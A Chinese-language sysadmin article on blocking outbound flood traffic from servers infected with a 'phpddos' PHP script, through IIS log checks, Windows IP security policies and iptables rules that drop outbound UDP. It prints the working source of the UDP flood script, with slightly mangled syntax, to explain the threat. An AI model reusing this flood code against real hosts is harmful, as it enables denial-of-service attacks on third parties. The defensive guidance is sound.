当前位置: > Linux安全 >

禁止服务器对外发包的方法

时间:2014-07-13 01:09来源:linux.it.net.cn 作者:IT网
一共四个安全策略,防止服务器上对外发包,一般使用第一个即可,有的策略使用后会禁止服务器内访问外网!

我们先来看phpddos对外发包的代码

 

$packets = 0; 
$ip = $_GET[ip]; 
$rand = $_GET[port]; 
set_time_limit(0); 
ignore_user_abort(FALSE); 
$exec_time = $_GET[time]; 
$time = time(); 
print /"Flooded: $ip on port $rand 
/"; 
$max_time = $time+$exec_time;

for($i=0;$i<65535;$i++){ 
$out .= /"X/"; 

while(1){ 
$packets++; 
if(time() > $max_time){ 
break; 

$fp = fsockopen(/"udp://$ip/", $rand, $errno, $errstr, 5); 
if($fp){ 
fwrite($fp, $out); 
fclose($fp); 


echo /"Packet complete at /".time(h:i:s/')./" with 
$packets (/" . round(($packets*65)/1024, 2) . /" mB) packets averaging /". 
round($packets/$exec_time, 2) . /" packets/s //n/"; 
?>

表现特征 
一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是服务器不断收到大量数据包. 
近期由于DEDECMS出现漏洞而导致大量服务器出现这个问题. 
如何快速找到这些站? 
你可以打开日志 
C:/Windows/System32/LogFiles/HTTPERR/httperr...log,打开今天时间的文件, 
里面有类似这样的记录: 
2011-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_1 
最后三项 783 Disabled 30_FreeHost_1 
783就是这个站在IIS中的ID 
30_FreeHost_1就是所在池


使用方法:

 引用内容
在开始--管理工具--本地安全策略--IP安全策略

菜单中的“操作”--导入策略

将"星外虚拟主机管理平台IPset"

导入,然后指派它,您也可以自己修改,增加一些你要封锁的端口。


星外虚拟主机管理平台IP策略4.1----这是正常情况下用的

没受到攻击的人不要用-关闭所有UDP端口禁止DNS2.0-----这是受到phpdos情况下用的,部分攻击可以用它来解决

没受到攻击的人不要用-关闭所有UDP端口禁止DNS及采集80端口----这是受到phpdos情况下用的,部分攻击可以用它来解决

没受到攻击的人不要用-禁止对外采集80端口---------这是大量用户对外采集影响带宽情况下才使用


说明:如果遇见保存策略时提示无法启动服务类似错误,请在服务里面启动IPSEC Services服务即可


对于linux系统用户上面办法显然不行,我们提供专业的linux防止办法

iptables防止php-ddos对外发包


一、允许需要UDP服务的端口(如DNS)

iptables -I OUTPUT -p udp --dport 53 -d 8.8.8.8 -j ACCEPT

二、禁止本机对外发送UDP包

iptables -A OUTPUT -p udp -j DROP

绿色“53”,为DNS所需要的UDP端口,黄色“8.8.8.8”部分为DNS IP,根据您服务器的设定来定,若您不知您当前服务器使用的DNS IP,可在SSH中执行以下命令获取:


cat /etc/resolv.conf |grep nameserver |awk 'NR==1{print $2 }'

(责任编辑:IT)
------分隔线----------------------------
栏目列表
推荐内容